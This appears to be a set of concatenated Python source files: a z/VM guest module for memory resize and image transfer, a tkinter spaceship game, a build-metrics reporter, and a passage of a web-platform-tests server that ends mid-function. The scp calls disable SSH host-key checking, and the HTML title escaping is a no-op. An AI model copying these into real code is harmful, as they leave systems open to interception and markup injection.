msg = ("Failed to revert user direct of guest '%s'." % userid)
LOG.error(msg)
return
LOG.debug("User directory Locked successfully for guest '%s'." %
userid)
# Replace user directory
try:
self._replace_user_direct(userid, user_entry)
except exception.SDKSMTRequestFailed:
msg = ("Failed to revert user direct of guest '%s'." % userid)
LOG.error(msg)
return
LOG.debug("User directory reverted successfully for guest '%s'." %
userid)
def _get_active_memory(self, userid):
# Return an integer value representing the active memory size in mb
output = self.execute_cmd(userid, "lsmem")
# cmd output contains following line:
# Total online memory : 8192 MB
active_mem = 0
for e in output:
if e.startswith("Total online memory : "):
try:
mem_info = e.split(' : ')[1].split(' ')
# sample mem_info: [u'2048', u'MB']
active_mem = int(zvmutils.convert_to_mb(mem_info[0] +
mem_info[1][0]))
except (IndexError, ValueError, KeyError, TypeError):
errmsg = ("Failed to get active storage size for guest: %s"
% userid)
LOG.error(errmsg)
raise exception.SDKInternalError(msg=errmsg)
break
return active_mem
def live_resize_memory(self, userid, memory):
# Get active memory size and compare with requested size
# If request size is smaller than the current size, then report
# error and exit immediately.
size = int(zvmutils.convert_to_mb(memory))
active_size = self._get_active_memory(userid)
if active_size > size:
LOG.error("Failed to live resize memory of guest: %(uid)s, "
"current active memory size: %(cur)im is greater than "
"the requested size: %(req)im." %
{'uid': userid, 'cur': active_size,
'req': size})
raise exception.SDKConflictError(modID='guest', rs=18,
userid=userid,
active=active_size,
req=size)
# Static resize memory. (increase/decrease memory from user directory)
(action, defined_mem, max_mem,
user_direct) = self.resize_memory(userid, memory)
# Compare active size and requested size, then update accordingly
if active_size == size:
# online memory already satisfied
LOG.info("Current active memory size of guest: '%s' equals the "
"requested size: '%iM', no more actions needed for "
"live resize." % (userid, size))
LOG.info("Live resize memory for guest: '%s' finished "
"successfully." % userid)
return
else:
# Do live resize. update memory size
increase_size = size - active_size
# Step1: Define new standby storage
cmd_str = ("vmcp def storage standby %sM" % increase_size)
try:
self.execute_cmd(userid, cmd_str)
except exception.SDKSMTRequestFailed as e:
# rollback and return
msg = ("Define standby memory of guest: '%s' failed with "
"error: %s." % (userid, e.format_message()))
LOG.error(msg)
# Start to do rollback
if action == 1:
LOG.debug("Start to revert user definition of guest '%s'."
% userid)
self._revert_user_direct(userid, user_direct)
# Finally, raise the error and exit
raise exception.SDKGuestOperationError(rs=11,
userid=userid,
err=e.format_message())
# Step 2: Online new memory
cmd_str = ("chmem -e %sM" % increase_size)
try:
self.execute_cmd(userid, cmd_str)
except exception.SDKSMTRequestFailed as err1:
# rollback and return
msg1 = ("Online memory of guest: '%s' failed with "
"error: %s." % (userid, err1.format_message()))
LOG.error(msg1)
# Start to do rollback
LOG.info("Start to do revert.")
LOG.debug("Reverting the standby memory.")
try:
self.execute_cmd(userid, "vmcp def storage standby 0M")
except exception.SDKSMTRequestFailed as err2:
# print revert error info and continue
msg2 = ("Revert standby memory of guest: '%s' failed with "
"error: %s." % (userid, err2.format_message()))
LOG.error(msg2)
# Continue to do the user directory change.
if action == 1:
LOG.debug("Reverting the user directory change of guest "
"'%s'." % userid)
self._revert_user_direct(userid, user_direct)
# Finally raise the exception
raise exception.SDKGuestOperationError(
rs=7, userid=userid, err=err1.format_message())
LOG.info("Live resize memory for guest: '%s' finished successfully."
% userid)
def is_rhcos(self, os_version):
return os_version.lower().startswith('rhcos')
def _get_wwpn_lun(self, userid):
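"""Return the (wwpn, lun) pair from the LOADDEV PORT/LUN statements in the user directory, or (None, None) when not set."""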
user_direct = self.get_user_direct(userid)
wwpn = None
lun = None
for ent in user_direct:
if ent.upper().startswith("LOADDEV PORT"):
wwpn = ent.split()[2].strip()
elif ent.upper().startswith("LOADDEV LUN"):
lun = ent.split()[2].strip()
return (wwpn, lun)
class FilesystemBackend(object):
@classmethod
def image_import(cls, image_name, url, target, **kwargs):
"""Import image from remote host to local image repository using scp.
If remote_host not specified, it means the source file exist in local
file system, just copy the image to image repository
"""
source = urlparse.urlparse(url).path
if kwargs['remote_host']:
if '@' in kwargs['remote_host']:
source_path = ':'.join([kwargs['remote_host'], source])
command = ' '.join(['/usr/bin/scp',
"-P", CONF.zvm.remotehost_sshd_port,
"-o StrictHostKeyChecking=no",
'-r ', source_path, target])
(rc, output) = zvmutils.execute(command)
if rc:
msg = ("Copying image file from remote filesystem failed"
" with reason: %s" % output)
LOG.error(msg)
raise exception.SDKImageOperationError(rs=10, err=output)
else:
msg = ("The specified remote_host %s format is invalid" %
kwargs['remote_host'])
LOG.error(msg)
raise exception.SDKImageOperationError(rs=11,
rh=kwargs['remote_host'])
else:
LOG.debug("Remote_host not specified, will copy from local")
try:
shutil.copyfile(source, target)
except Exception as err:
msg = ("Import image from local file system failed"
" with reason %s" % six.text_type(err))
LOG.error(msg)
raise exception.SDKImageOperationError(rs=12,
err=six.text_type(err))
@classmethod
def image_export(cls, source_path, dest_url, **kwargs):
"""Export the specific image to remote host or local file system """
dest_path = urlparse.urlparse(dest_url).path
if kwargs['remote_host']:
target_path = ':'.join([kwargs['remote_host'], dest_path])
command = ' '.join(['/usr/bin/scp',
"-P", CONF.zvm.remotehost_sshd_port,
"-o StrictHostKeyChecking=no",
'-r ', source_path, target_path])
(rc, output) = zvmutils.execute(command)
if rc:
msg = ("Error happened when copying image file to remote "
"host with reason: %s" % output)
LOG.error(msg)
raise exception.SDKImageOperationError(rs=21, msg=output)
else:
# Copy to local file system
LOG.debug("Remote_host not specified, will copy to local server")
try:
shutil.copyfile(source_path, dest_path)
except Exception as err:
msg = ("Export image from %(src)s to local file system"
" %(dest)s failed: %(err)s" %
{'src': source_path,
'dest': dest_path,
'err': six.text_type(err)})
LOG.error(msg)
raise exception.SDKImageOperationError(rs=22,
err=six.text_type(err))
class HTTPBackend(object):
@classmethod
def image_import(cls, image_name, url, target, **kwargs):
import_image = MultiThreadDownloader(image_name, url,
target)
import_image.run()
class MultiThreadDownloader(threading.Thread):
def __init__(self, image_name, url, target):
super(MultiThreadDownloader, self).__init__()
self.url = url
# Set thread number
self.threadnum = 8
r = requests.head(self.url)
# Get the size of the download resource
self.totalsize = int(r.headers['Content-Length'])
self.target = target
def handle_download_errors(func):
@functools.wraps(func)
def wrapper(self, *args, **kwargs):
try:
return func(self, *args, **kwargs)
except Exception as err:
self.fd.close()
msg = ("Download image from http server failed: %s" %
six.text_type(err))
LOG.error(msg)
raise exception.SDKImageOperationError(rs=9,
err=six.text_type(err))
return wrapper
def get_range(self):
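"""Split the total download size into per-thread byte ranges; the last range is open-ended so it covers any remainder."""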
ranges = []
offset = int(self.totalsize / self.threadnum)
for i in range(self.threadnum):
if i == self.threadnum - 1:
ranges.append((i * offset, ''))
else:
# Get the process range for each thread
ranges.append((i * offset, (i + 1) * offset))
return ranges
def download(self, start, end):
headers = {'Range': 'Bytes=%s-%s' % (start, end),
'Accept-Encoding': '*'}
# Get the data
res = requests.get(self.url, headers=headers)
# seek to the right position for writing data
LOG.debug("Downloading file range %s:%s success" % (start, end))
with _LOCK:
self.fd.seek(start)
self.fd.write(res.content)
@handle_download_errors
def run(self):
self.fd = open(self.target, 'wb')  # binary mode: downloaded chunks are bytes
thread_list = []
n = 0
for ran in self.get_range():
start, end = ran
LOG.debug('thread %d start:%s,end:%s' % (n, start, end))
n += 1
# Open thread
thread = threading.Thread(target=self.download, args=(start, end))
thread.start()
thread_list.append(thread)
for i in thread_list:
i.join()
LOG.info('Download %s success' % (self.name))
self.fd.close()
|
ship.py
|
import tkinter as tk
from utils.fonts import _getFont
from game.panel import Switch, BinaryButton, ButtonGroup, VerticalSlider, HorizontalSlider
from time import sleep
from threading import Thread
Y_OFFSET = 220
PANEL_HEIGHT = 127
PANEL_WIDTH = 140
class Ship(tk.Canvas):
def __init__(self, root):
tk.Canvas.__init__(self, root, width=700, height=600, bd=0, highlightthickness=0, bg='black')
self.root = root
self.gameConnection = self.root.gameConnection
self.udpPacket = self.root.udpPacket
self._loadView()
self._preparePanels()
self._prepareControls(self.root.gameData['player_index'])
Thread(target=self.clockTick).start()
Thread(target=self.commandListener).start()
def addPanel(self, **kw):
# gridPos: (x, y) panel grid coordinates, x in 0..4, y in 0..2
width, height, gridPos = (kw['width'], kw['height'], kw['gridPos'])
self.create_image(
gridPos[0] * PANEL_WIDTH,
gridPos[1] * PANEL_HEIGHT + Y_OFFSET,
image=self.panels['%dx%d' % (width, height)],
anchor=tk.NW
)
def _preparePanels(self):
circuits = tk.PhotoImage(file='assets/background/circuits.png')
# Panels
panel1x1 = tk.PhotoImage(file='assets/panels/1x1.png')
panel1x2 = tk.PhotoImage(file='assets/panels/1x2.png')
panel2x1 = tk.PhotoImage(file='assets/panels/2x1.png')
panel2x2 = tk.PhotoImage(file='assets/panels/2x2.png')
panel3x1 = tk.PhotoImage(file='assets/panels/3x1.png')
self.panels = {
'1x1': panel1x1,
'1x2': panel1x2,
'2x1': panel2x1,
'2x2': panel2x2,
'3x1': panel3x1
}
self.circuits = circuits.zoom(2)
self.create_image(700, Y_OFFSET, image=self.circuits, anchor=tk.NE)
def _loadView(self):
ship = tk.PhotoImage(file='assets/elements/ship-small.png')
instruction = tk.PhotoImage(file='assets/elements/instruction.png')
timer_empty = tk.PhotoImage(file='assets/elements/timer-empty-transparent.png')
space = tk.PhotoImage(file='assets/elements/space-top.png')
self.ship = ship
self.instruction = instruction.zoom(3).subsample(2)
self.timer_empty = timer_empty.zoom(3).subsample(2)
self.space = space
self.create_image(0, 0, image=self.space, anchor=tk.NW)
self.create_image(400, 50, image=self.ship, tags='SHIP')
# Instruction
for distance in range(8):
self.create_image(distance * 95, 100, image=self.instruction, anchor=tk.NW)
self.create_rectangle(0, 195, 700, 220, fill='green', outline='', tags='TIMER')
self.create_image(0, 195, image=self.timer_empty, anchor=tk.NW)
self.create_image(480, 195, image=self.timer_empty, anchor=tk.NW)
self.create_text(30, 150, text='▶ ' + self.root.gameData['command'], fill='white', font=_getFont('heading'), anchor=tk.W, tags='COMMAND_VIEW')
def clockTick(self):
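# Timer loop: every 0.1 s shrink the 'TIMER' bar to currentTime/totalTime of the canvas width, turning it yellow below ~60% and red below ~30%.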
while True:
tick = self.root.gameData['currentTime']
total = self.root.gameData['totalTime']
c = self.coords('TIMER')
self.coords('TIMER', c[0], c[1], round((tick / total) * 700), c[3])
if c[2] < 420 and c[2] > 210:
self.itemconfig('TIMER', fill='yellow')
elif c[2] < 210:
self.itemconfig('TIMER', fill='red')
sleep(0.1)
self.itemconfig('TIMER', fill='green')
def commandListener(self):
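# Poll the shared gameData for a new command and refresh the on-screen command text when it changes.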
prevCommand = self.root.gameData['command']
while True:
if prevCommand != self.root.gameData['command']:
prevCommand = self.root.gameData['command']
self.itemconfig('COMMAND_VIEW', text='▶ ' + prevCommand)
def _prepareControls(self, player):
if player == 0:
self.controls = [
Switch(self, 'Calcium Razor', 'CALCIUM_RAZOR', (0, 0)),
BinaryButton(self, 'Salty Cannister', 'SALTY_CANNISTER', (1, 0)),
BinaryButton(self, 'Waveform Collider', 'WAVEFORM_COLLIDER', (1, 1)),
ButtonGroup(self, 'Protolube Optimizer', 'PROTOLUBE_OPTIMIZER', (3, 0), ['Defragment', 'Fragment']),
VerticalSlider(self, 'Quasipaddle', 'QUASIPADDLE', (0, 1)),
HorizontalSlider(self, 'Psylocibin Capacitor', 'PSYLOCIBIN_CAPACITOR', (1, 2)),
Switch(self, 'Arcball Pendulum', 'ARCBALL_PENDULUM', (4, 2), horizontal=False),
]
elif player == 1:
self.controls = [
VerticalSlider(self, 'Lorentz Whittler', 'LORENTZ_WHITTLER', (0, 0)),
VerticalSlider(self, 'Alpha Wave', 'ALPHA_WAVE', (1, 0)),
BinaryButton(self, 'Holospindle ', 'HOLOSPINDLE', (0, 2)),
ButtonGroup(self, 'Contracting Propeller', 'CONTRACTING_PROPELLER', (2, 0), ['Acquire', 'Kick']),
HorizontalSlider(self, 'Iodine Shower', 'IODINE_SHOWER', (2, 2)),
Switch(self, 'Orbring', 'ORBRING', (4, 0)),
]
self.addPanel(width=1, height=1, gridPos=(4, 1))
elif player == 2:
self.controls = [
ButtonGroup(self, 'Kilobypass Transformer', 'KILOBYPASS_TRANSFORMER', (0, 0), ['Engage', 'Disengage']),
Switch(self, 'Altitude Operator', 'ALTITUDE_OPERATOR', (0, 2), horizontal=False),
Switch(self, 'Glycol Pump', 'GLYCOL_PUMP', (1, 2), horizontal=False),
HorizontalSlider(self, 'Fluxloosener Inducer', 'FLUXLOOSENER_INDUCER', (2, 0)),
VerticalSlider(self, 'Pressurized Varnish', 'PRESSURIZED_VARNISH', (2, 1)),
BinaryButton(self, 'Cabin Fan ', 'CABIN_FAN', (3, 2)),
Switch(self, 'Gamma Radiator', 'GAMMA_RADIATOR', (4, 1)),
]
self.addPanel(width=1, height=1, gridPos=(3, 1))
elif player == 3:
self.controls = [
HorizontalSlider(self, 'Thermonuclear Resonator', 'THERMONUCLEAR_RESONATOR', (0, 0)),
ButtonGroup(self, 'Docking Probe', 'DOCKING_PROBE', (0, 1), ['Extend', 'Retract']),
VerticalSlider(self, 'SCE Power', 'SCE_POWER', (2, 1)),
BinaryButton(self, 'Suit Composition', 'SUIT_COMPOSITION', (3, 0)),
Switch(self, 'H2O Flow', 'H2O_FLOW', (3, 1)),
Switch(self, 'Waste Dump', 'WASTE_DUMP', (3, 2)),
VerticalSlider(self, 'Int Lights', 'INT_LIGHTS', (4, 1)),
]
|
build_metrics_reporter.py
|
#
# All or portions of this file Copyright (c) Amazon.com, Inc. or its affiliates or
# its licensors.
#
# For complete copyright and license terms please see the LICENSE at the root of this
# distribution (the "License"). All use of this software is governed by the License,
# or, if provided, by the license below or the license accompanying this file. Do not
# remove or modify any license notices. This file is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#
import datetime
import json
try:
import queue  # Python 3
except ImportError:
import Queue as queue  # Python 2
import threading
import time
import traceback
import logging
import os
import socket
import sys
BUILD_METRICS_FILENAME = 'build_metrics.txt'
LOG_FILE_NAME = 'build_metrics_reporter.log'
MetricUnit = \
{
'Seconds':'Seconds',
'Milliseconds':'Milliseconds',
'Microseconds':'Microseconds',
'Bytes':'Bytes',
'Kilobytes':'Kilobytes',
'Megabytes':'Megabytes',
'Gigabytes':'Gigabytes',
'Terabytes':'Terabytes',
'Bits':'Bits',
'Kilobits':'Kilobits',
'Megabits':'Megabits',
'Gigabits':'Gigabits',
'Terabits':'Terabits',
'Percent':'Percent',
'Count':'Count',
'BytesPerSecond':'Bytes/Second',
'KilobytesPerSecond':'Kilobytes/Second',
'MegabytesPerSecond':'Megabytes/Second',
'GigabytesPerSecond':'Gigabytes/Second',
'TerabytesPerSecond':'Terabytes/Second',
'BitsPerSecond':'Bits/Second',
'KilobitsPerSecond':'Kilobits/Second',
'MegabitsPerSecond':'Megabits/Second',
'GigabitsPerSecond':'Gigabits/Second',
'TerabitsPerSecond':'Terabits/Second',
'CountPerSecond':'Count/Second',
'Unitless':'None'
}
def datetime_to_iso(dt):
"""Given a datetime object, convert it to an ISO-8601 formatted string."""
return dt.strftime('%Y-%m-%dT%H:%M:%S.%f')
class MetricDatum(object):
"""Represents a single metric data point for reporting."""
def __init__(self, name, units, timestamp=None):
self.dimensions = {}
self.name = name
self.timestamp = timestamp
if self.timestamp is None:
self.timestamp = datetime.datetime.utcnow()
self.units = units
self.value = 0.0
self.additional_metadata = {}
def __str__(self):
return json.dumps(self.to_api_format())
def to_api_format(self):
dimensions = []
for key in self.dimensions:
dimensions.append({'Name': key, 'Value': self.dimensions[key]})
json_val = {
'MetricName': self.name,
'Dimensions': dimensions,
'Timestamp': datetime_to_iso(self.timestamp),
'Value': float(self.value),
'Unit': self.units if self.units is not None else MetricUnit['Unitless'],
'Metadata': self.additional_metadata
}
return json_val
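# Illustrative sketch only (not part of the original module; the metric name and
# dimension are hypothetical): a datum for a 'compile_time' metric would serialize
# to something like
#   {"MetricName": "compile_time", "Dimensions": [{"Name": "platform", "Value": "win_x64"}],
#    "Timestamp": "2020-01-01T12:00:00.000000", "Value": 42.0, "Unit": "Seconds", "Metadata": {}}
# and is written one-per-line to build_metrics.txt by MetricReporter below.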
class MetricReporter(object):
MAX_DIMENSIONS_PER_METRIC = 10
MAX_DATUM_COUNT_PER_REQUEST = 20
METRIC_QUEUE_TIMEOUT_SECS = 1
SHUTDOWN_TIMEOUT_SECS = 5
def __init__(self, namespace, async_option=True):
"""Create a new Metric Reporter.
If async=True (the default), the reporter will not transmit
anything until the 'start' method is called. start() will cause a background thread to be spun up that
will handle transmitting metrics.
If async=False, metrics will queue up in memory and will not be transmitted until flush() is called."""
self.namespace = namespace
self.global_dimensions = {}
self.async_option = async_option
self.project_spec = None
self.metrics_namespace = None
self.use_incredibuild = False
self.output_directories = []
self.additional_metric_metadata = {}
self._last_transmit_time = None
self._pending_metrics_queue = queue.Queue()
self._running = False
self._metric_send_thread = None
self._pending_condition = threading.Condition()
self._force_flush = False
self._logger = logging.getLogger('MetricReporter')
# truncate the log file, eventually we need to send the logs to cloudwatch logs
with open(LOG_FILE_NAME, 'w'):
pass
fileHdlr = logging.FileHandler(LOG_FILE_NAME)
formatter = logging.Formatter('%(asctime)s %(levelname)s %(message)s')
fileHdlr.setFormatter(formatter)
self._logger.addHandler(fileHdlr)
self._logger.setLevel(logging.DEBUG)
self._logger.info('Created MetricReporter.')
self.command_line = sys.argv
def _wake_up_background_thread(self):
"""Signal the background thread to wake up and check the metric queue."""
if not self.async_option:
return
self._pending_condition.acquire()
try:
self._pending_condition.notify()
finally:
self._pending_condition.release()
def parse_command_line(self, command_line):
self._logger.info('Parsing command line...')
for index, arg in enumerate(command_line):
if arg == '-p' or arg == '--project-spec':
if index+1 < len(command_line):
self.project_spec = command_line[index+1]
elif arg == '--metrics-namespace':
if index+1 < len(command_line):
self.metrics_namespace = command_line.pop(index+1)
elif arg.lower() == '--use-incredibuild=true':
self.use_incredibuild=True
#strip the metrics parameters from argv so WAF doesn't complain about it later
try:
command_line.remove('--metrics-namespace')
except ValueError: # if for some reason this isn't in here we don't want the process to end, it's fine to move on
pass
try:
command_line.remove('--enable-build-metrics')
except ValueError:
pass
if self.metrics_namespace is None:
return False
return True
def set_build_command(self, cmd):
self.additional_metric_metadata['build_command'] = cmd
def start(self):
"""Start the background metrics thread. Has no effect is async=False or if
start() has already been called."""
self._logger.info('Starting MetricReporter.')
if not self.async_option or self._running:
return
self._running = True
self.additional_metric_metadata['host_name'] = socket.gethostname()
self.additional_metric_metadata['metrics_namespace'] = str(self.metrics_namespace)
self.additional_metric_metadata['project_spec'] = str(self.project_spec)
self.additional_metric_metadata['use_incredibuild'] = str(self.use_incredibuild)
# this gets replaced later
self.additional_metric_metadata['build_result'] = "#BUILD_RESULT#"
build_id = os.getenv('BUILD_ID')
command_id = os.getenv('COMMAND_ID')
if build_id is None:
self._logger.error('No build id is set! These metrics will be lost!')
else:
self.additional_metric_metadata['build_id'] = build_id
if command_id is None:
self._logger.error('No command id is set! These metrics will be lost!')
else:
self.additional_metric_metadata['command_id'] = command_id
self._metric_send_thread = threading.Thread(target=self._metric_loop)
self._metric_send_thread.daemon = True
self._metric_send_thread.start()
def stop(self, gather_output_sizes=False, wait_for_empty_queue=False):
"""Stop the background metrics thread.
If 'wait_for_empty_queue' is set to True, calling thread will block until all metrics have been
transmitted or shutdown times out.
Has no effect if async_option=False or if the background thread is not running."""
if not self.async_option or not self._running:
return
# setting async_option to False here makes the later flush() call dump the queue immediately instead of trying
# to wake up the background thread
self.async_option = False
if gather_output_sizes:
self.gather_output_sizes()
self._running = False
self.flush()
if wait_for_empty_queue:
self._logger.info('waiting for empty queue')
self._metric_send_thread.join(timeout=MetricReporter.SHUTDOWN_TIMEOUT_SECS)
for handler in list(self._logger.handlers):
handler.close()
self._logger.removeHandler(handler)
def flush(self):
"""If async=True, wakes up background thread and forces a flush of any stored metrics.
If async=False, this call will block on a synchronous flush of metrics to file."""
if self.async_option:
self._force_flush = True
self._wake_up_background_thread()
else:
while not self._pending_metrics_queue.empty():
try:
self._write_metrics_to_file()
except Exception:  # stop flushing if writing to the metrics file fails
break
def create_metric(self, name, units, timestamp=None):
"""
Creates a metric with the given name, units & timestamp.
If timestamp is not specified, it will default to the current time.
This method is preferred to directly creating a MetricDatum object because it will also apply
global dimensions that have been set.
"""
metric = MetricDatum(name, units, timestamp)
for key in self.global_dimensions:
if len(metric.dimensions) >= MetricReporter.MAX_DIMENSIONS_PER_METRIC:
self._logger.warning('Too many dimensions for metric "%s"; dropping dimension "%s"' % (name, key))
break
metric.dimensions[key] = self.global_dimensions[key]
metric.additional_metadata = self.additional_metric_metadata
return metric
def put_metric(self, metric):
"""
Put a new metric on the queue to be transmitted.
If the pending metrics queue is full, the metric will just be ignored and an error printed.
"""
if not self._running:
return
try:
self._logger.info('MetricsReporter:Metric submitted: %s' % metric.name)
self._pending_metrics_queue.put_nowait(metric)
except queue.Full:
self._logger.error('Metrics queue is full. Ignoring new metric named "%s"' % metric.name)
if self.async_option:
self._wake_up_background_thread()
def add_output_directory(self, out_dir):
self.output_directories.append(out_dir)
def gather_output_sizes(self):
"""
Walk through each output directory and determine its size, adding them together to determine the final
overall size of the build.
"""
if len(self.output_directories) == 0:
return
self._logger.info('gathering output sizes...')
size_in_bytes = 0
for dir in self.output_directories:
size = sum( os.path.getsize(os.path.join(dirpath,filename)) for dirpath, dirnames, filenames in os.walk( dir ) for filename in filenames )
size_in_bytes += size
submit_metric(self, 'build_size', MetricUnit['Bytes'], size_in_bytes)
self.flush()
def _write_metrics_to_file(self):
metrics_to_write = []
while not self._pending_metrics_queue.empty() and len(metrics_to_write) < MetricReporter.MAX_DATUM_COUNT_PER_REQUEST:
try:
metric = self._pending_metrics_queue.get(True, MetricReporter.METRIC_QUEUE_TIMEOUT_SECS)
if metric:
metrics_to_write.append(metric.to_api_format())
except queue.Empty:
pass
self._logger.info('Writing %s metrics to file' % str(len(metrics_to_write)))
if metrics_to_write:
with open(BUILD_METRICS_FILENAME, 'a') as f:
for metric in metrics_to_write:
self._logger.info('Writing metric %s' % str(metric))
f.write(str(metric))
f.write('\n')
def _metric_loop(self):
"""
Function for the background daemon thread (only used if async_option=True) to consistently loop and write metrics to file.
"""
if not self.async_option:
return
if self._last_transmit_time is None:
self._last_transmit_time = time.time()
self._logger.info('Background metrics thread starting...')
while self._running:
try:
self._pending_condition.acquire()
try:
while (self._pending_metrics_queue.qsize() < MetricReporter.MAX_DATUM_COUNT_PER_REQUEST and
time.time()-self._last_transmit_time < MetricReporter.METRIC_QUEUE_TIMEOUT_SECS and
self._running and
not self._force_flush):
self._pending_condition.wait(timeout=MetricReporter.METRIC_QUEUE_TIMEOUT_SECS)
finally:
self._pending_condition.release()
self._force_flush = False
self._last_transmit_time = time.time()
if self._pending_metrics_queue.empty():
continue
self._write_metrics_to_file()
except Exception as e:
traceback.print_exc()
self._logger.error('Error in MetricsReporter thread: %s' % str(e))
time.sleep(MetricReporter.METRIC_QUEUE_TIMEOUT_SECS)
self.flush()
self._logger.info('Background metrics thread terminating...')
def submit_metric(recorder, name, units, value, dimensions=None, timestamp=None):
"""
This is just a convenience method that creates a MetricDatum,
populates it with a value and adds it to the pending queue on the supplied MetricRecorder.
"""
metric_datum = recorder.create_metric(name, units, timestamp)
metric_datum.value = value
if dimensions is None:
dimensions = {}
metric_datum.dimensions = dimensions
recorder.put_metric(metric_datum)
def submit_build_metric(name, units, value, dimensions, disable_dimension_unwrap=False, disable_no_dimension=False):
dim_list = []
if disable_dimension_unwrap:
dim_list.append(dimensions.copy())
else:
while dimensions:
dim_list.append(dimensions.copy())
dimensions.popitem()
if not disable_no_dimension:
dim_list.append({})
dim_list.reverse()
for dimension_dict in dim_list:
submit_metric(metric_reporter, name, units, value, dimension_dict)
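# Worked example of the dimension unwrapping above (metric name and dimension values are
# hypothetical): calling
#   submit_build_metric('compile_time', MetricUnit['Seconds'], 42.0,
#                       {'platform': 'win_x64', 'config': 'profile'})
# emits the metric three times: once with no dimensions, once with {'platform'} only, and
# once with {'platform', 'config'} (insertion order determines which prefixes are kept,
# and the dict passed in is consumed by popitem). disable_dimension_unwrap=True emits only
# the full dimension set; disable_no_dimension=True drops the dimensionless copy.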
def add_output_directory(out_dir):
metric_reporter.add_output_directory(out_dir)
def set_build_command(cmd):
metric_reporter.set_build_command(cmd)
metric_reporter = MetricReporter('WAF_BuildMetrics')
def stop_metric_reporter(gather_output_sizes=False, wait_for_empty_queue=False):
metric_reporter.stop(gather_output_sizes, wait_for_empty_queue)
def start_metric_reporter():
metric_reporter.start()
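# Minimal usage sketch for this module (hypothetical; assumes a WAF build script driving it):
#
#   import build_metrics_reporter as bmr
#   if bmr.metric_reporter.parse_command_line(sys.argv):
#       bmr.start_metric_reporter()
#       bmr.submit_build_metric('configure_time', bmr.MetricUnit['Seconds'], 12.5, {'platform': 'win_x64'})
#       bmr.stop_metric_reporter(gather_output_sizes=False, wait_for_empty_queue=True)
#
# Metrics end up as JSON lines in build_metrics.txt for a later upload step to consume.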
|
serve.py
|
# -*- coding: utf-8 -*-
from __future__ import print_function
import abc
import argparse
import json
import logging
import os
import platform
import signal
import socket
import sys
import threading
import time
import traceback
from six.moves import urllib
import uuid
from collections import defaultdict, OrderedDict
from itertools import chain, product
from multiprocessing import Process, Event
from localpaths import repo_root
from six.moves import reload_module
from manifest.sourcefile import read_script_metadata, js_meta_re, parse_variants
from wptserve import server as wptserve, handlers
from wptserve import stash
from wptserve import config
from wptserve.logger import set_logger
from wptserve.handlers import filesystem_path, wrap_pipeline
from wptserve.utils import get_port, HTTPException, http2_compatible
from mod_pywebsocket import standalone as pywebsocket
EDIT_HOSTS_HELP = ("Please ensure all the necessary WPT subdomains "
"are mapped to a loopback device in /etc/hosts. "
"See https://github.com/web-platform-tests/wpt#running-the-tests "
"for instructions.")
def replace_end(s, old, new):
"""
Given a string `s` that ends with `old`, replace that occurrence of `old`
with `new`.
"""
assert s.endswith(old)
return s[:-len(old)] + new
def domains_are_distinct(a, b):
a_parts = a.split(".")
b_parts = b.split(".")
min_length = min(len(a_parts), len(b_parts))
slice_index = -1 * min_length
return a_parts[slice_index:] != b_parts[slice_index:]
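# For example, domains_are_distinct("web-platform.test", "not-web-platform.test") is True,
# while domains_are_distinct("web-platform.test", "www.web-platform.test") is False because
# the shorter domain is a suffix of the longer one.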
class WrapperHandler(object):
__meta__ = abc.ABCMeta
headers = []
def __init__(self, base_path=None, url_base="/"):
self.base_path = base_path
self.url_base = url_base
self.handler = handlers.handler(self.handle_request)
def __call__(self, request, response):
self.handler(request, response)
def handle_request(self, request, response):
for header_name, header_value in self.headers:
response.headers.set(header_name, header_value)
self.check_exposure(request)
path = self._get_path(request.url_parts.path, True)
query = request.url_parts.query
if query:
query = "?" + query
meta = "\n".join(self._get_meta(request))
script = "\n".join(self._get_script(request))
response.content = self.wrapper % {"meta": meta, "script": script, "path": path, "query": query}
wrap_pipeline(path, request, response)
def _get_path(self, path, resource_path):
"""Convert the path from an incoming request into a path corresponding to an "unwrapped"
resource e.g. the file on disk that will be loaded in the wrapper.
:param path: Path from the HTTP request
:param resource_path: Boolean used to control whether to get the path for the resource that
this wrapper will load or the associated file on disk.
Typically these are the same but may differ when there are multiple
layers of wrapping e.g. for a .any.worker.html input the underlying disk file is
.any.js but the top level html file loads a resource with a
.any.worker.js extension, which itself loads the .any.js file.
If True return the path to the resource that the wrapper will load,
otherwise return the path to the underlying file on disk."""
for item in self.path_replace:
if len(item) == 2:
src, dest = item
else:
assert len(item) == 3
src = item[0]
dest = item[2 if resource_path else 1]
if path.endswith(src):
path = replace_end(path, src, dest)
return path
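# Example using WorkersHandler below: with resource_path=True a request for
# "/foo/bar.any.worker.html" maps to "/foo/bar.any.worker.js" (the resource the wrapper
# loads), while resource_path=False maps it to "/foo/bar.any.js" (the file on disk).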
def _get_metadata(self, request):
"""Get an iterator over script metadata based on // META comments in the
associated js file.
:param request: The Request being processed.
"""
path = self._get_path(filesystem_path(self.base_path, request, self.url_base), False)
try:
with open(path, "rb") as f:
for key, value in read_script_metadata(f, js_meta_re):
yield key, value
except IOError:
raise HTTPException(404)
def _get_meta(self, request):
"""Get an iterator over strings to inject into the wrapper document
based on // META comments in the associated js file.
:param request: The Request being processed.
"""
for key, value in self._get_metadata(request):
replacement = self._meta_replacement(key, value)
if replacement:
yield replacement
def _get_script(self, request):
"""Get an iterator over strings to inject into the wrapper document
based on // META comments in the associated js file.
:param request: The Request being processed.
"""
for key, value in self._get_metadata(request):
replacement = self._script_replacement(key, value)
if replacement:
yield replacement
@abc.abstractproperty
def path_replace(self):
# A list containing a mix of 2 item tuples with (input suffix, output suffix)
# and 3-item tuples with (input suffix, filesystem suffix, resource suffix)
# for the case where we want a different path in the generated resource to
# the actual path on the filesystem (e.g. when there is another handler
# that will wrap the file).
return None
@abc.abstractproperty
def wrapper(self):
# String template with variables path and meta for wrapper document
return None
@abc.abstractmethod
def _meta_replacement(self, key, value):
# Get the string to insert into the wrapper document, given
# a specific metadata key: value pair.
pass
@abc.abstractmethod
def check_exposure(self, request):
# Raise an exception if this handler shouldn't be exposed after all.
pass
class HtmlWrapperHandler(WrapperHandler):
global_type = None
headers = [('Content-Type', 'text/html')]
def check_exposure(self, request):
if self.global_type:
globals = b""
for (key, value) in self._get_metadata(request):
if key == b"global":
globals = value
break
if self.global_type not in parse_variants(globals):
raise HTTPException(404, "This test cannot be loaded in %s mode" %
self.global_type)
def _meta_replacement(self, key, value):
if key == b"timeout":
if value == b"long":
return '<meta name="timeout" content="long">'
if key == b"title":
value = value.decode('utf-8').replace("&", "&").replace("<", "<")
return '<title>%s</title>' % value
return None
def _script_replacement(self, key, value):
if key == b"script":
attribute = value.decode('utf-8').replace("&", "&amp;").replace('"', "&quot;")
